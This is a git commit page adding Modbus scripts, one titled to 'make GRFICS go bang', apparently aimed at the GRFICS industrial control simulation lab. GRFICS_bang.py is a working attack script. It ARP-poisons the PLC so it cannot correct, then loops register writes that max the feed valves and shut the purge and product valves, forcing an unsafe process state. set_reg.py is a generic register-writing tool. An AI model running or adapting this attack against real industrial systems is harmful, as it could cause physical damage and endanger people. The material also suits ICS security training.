useful scripts and make GRFICS go bang!
1 parent 472adba commit 4b3abd68df12457228a729b88ac5d7fe991ae47e
root authored on 9 May 2022
Showing 4 changed files
View
modbus/GRFICS_bang.png 0 → 100755
View
109
modbus/GRFICS_bang.py 0 → 100644
#!/usr/bin/env python
 
"""
File: GRFICS_bang.py
Desc: Set the registers to values wanted and ARP poison the PLC so it can't correct.
"""
__author__ = '0xRoM'
from scapy.all import Ether, ARP, srp, send
from pyModbusTCP.client import ModbusClient
from multiprocessing import Process
import time
import sys
import os
 
def _enable_linux_iproute():
"""
Enables IP route ( IP Forward ) in linux-based distro
"""
os.system('echo 1 > /proc/sys/net/ipv4/ip_forward')
 
def get_mac(ip):
"""
Returns MAC address of any device connected to the network
If ip is down, returns None instead
"""
ans, _ = srp(Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(pdst=ip), timeout=3, verbose=0)
if ans:
return ans[0][1].src
 
def spoof(target_ip, host_ip, verbose=True):
"""
Spoofs `target_ip` saying that we are `host_ip`.
it is accomplished by changing the ARP cache of the target (poisoning)
"""
# get the mac address of the target
target_mac = get_mac(target_ip)
# craft the arp 'is-at' operation packet, in other words; an ARP response
# we don't specify 'hwsrc' (source MAC address)
# because by default, 'hwsrc' is the real MAC address of the sender (ours)
arp_response = ARP(pdst=target_ip, hwdst=target_mac, psrc=host_ip, op='is-at')
# send the packet
# verbose = 0 means that we send the packet without printing any thing
send(arp_response, verbose=0)
if verbose:
# get the MAC address of the default interface we are using
self_mac = ARP().hwsrc
print("[+] Sent to {} : {} is-at {}".format(target_ip, host_ip, self_mac))
 
def restore(target_ip, host_ip, verbose=True):
"""
Restores the normal process of a regular network
This is done by sending the original informations
(real IP and MAC of `host_ip` ) to `target_ip`
"""
# get the real MAC address of target
target_mac = get_mac(target_ip)
# get the real MAC address of spoofed (gateway, i.e router)
host_mac = get_mac(host_ip)
# crafting the restoring packet
arp_response = ARP(pdst=target_ip, hwdst=target_mac, psrc=host_ip, hwsrc=host_mac)
# sending the restoring packet
# to restore the network to its normal process
# we send each reply seven times for a good measure (count=7)
send(arp_response, verbose=0, count=7)
if verbose:
print("[+] Sent to {} : {} is-at {}".format(target_ip, host_ip, host_mac))
 
def spoof_wrapper():
while True:
spoof(arp_target, arp_host, verbose)
 
arp_target = "192.168.95.2"
arp_host = "192.168.95.1"
verbose = False
_enable_linux_iproute()
 
try:
p = Process(target=spoof_wrapper)
p.start()
#p.join() # wait for it to finish! *yuk*
 
while True:
 
# set A
client=ModbusClient(host="192.168.95.10",port=502,auto_open=True,auto_close=True,timeout=10)
client.write_single_register(1,65535)
client.close()
 
# set B
client=ModbusClient(host="192.168.95.11",port=502,auto_open=True,auto_close=True,timeout=10)
client.write_single_register(1,65535)
client.close()
 
# set purge
client=ModbusClient(host="192.168.95.12",port=502,auto_open=True,auto_close=True,timeout=10)
client.write_single_register(1,0)
client.close()
 
# set product
client=ModbusClient(host="192.168.95.13",port=502,auto_open=True,auto_close=True,timeout=10)
client.write_single_register(1,0)
client.close()
 
#time.sleep(0.2)
 
except KeyboardInterrupt:
print("[!] Detected CTRL+C ! restoring the network, please wait...")
restore(arp_target, arp_host)
View
1
■■■■
modbus/set_coil.py
if args.true:
client.write_single_coil(args.coil,True)
else:
client.write_single_coil(args.coil,False)
client.close()
 
if args.loop:
i=1
while True:
View
37
modbus/set_reg.py 0 → 100644
#!/usr/bin/env python
 
"""
File: set_reg.py
Desc: set a specific register to a specific value
"""
__author__ = '0xRoM'
from argparse import ArgumentParser, ArgumentTypeError
from pyModbusTCP.client import ModbusClient
import time
import sys
 
parser = ArgumentParser()
parser.add_argument('-i','--ipaddress', action='store', type=str, required=True, help='Input IP Address')
parser.add_argument('-p','--port', action='store', type=int, required=False, help='Port Number', default=502)
parser.add_argument('-r','--reg', action='store', type=int, required=True, help='Register Number', default=0)
parser.add_argument('-v','--val', action='store', type=int, required=True, help='Register Value', default=0)
parser.add_argument('-l','--loop', action='store_true', required=False, help='loop on')
parser.add_argument('-t','--timeout', action='store', type=float, required=False, help='request every X seconds', default=2)
args = parser.parse_args()
 
client=ModbusClient(host=args.ipaddress,port=args.port,auto_open=True,auto_close=True,timeout=10)
client.write_single_register(args.reg,args.val)
client.close()
 
if args.loop:
i=1
while True:
client=ModbusClient(host=args.ipaddress,port=args.port,auto_open=True,auto_close=True,timeout=10)
client.write_single_register(args.reg,args.val)
client.close()
print '\r>>packet: %d' % i,
sys.stdout.flush()
i+=1
time.sleep(args.timeout)
 
Buy Me A Coffee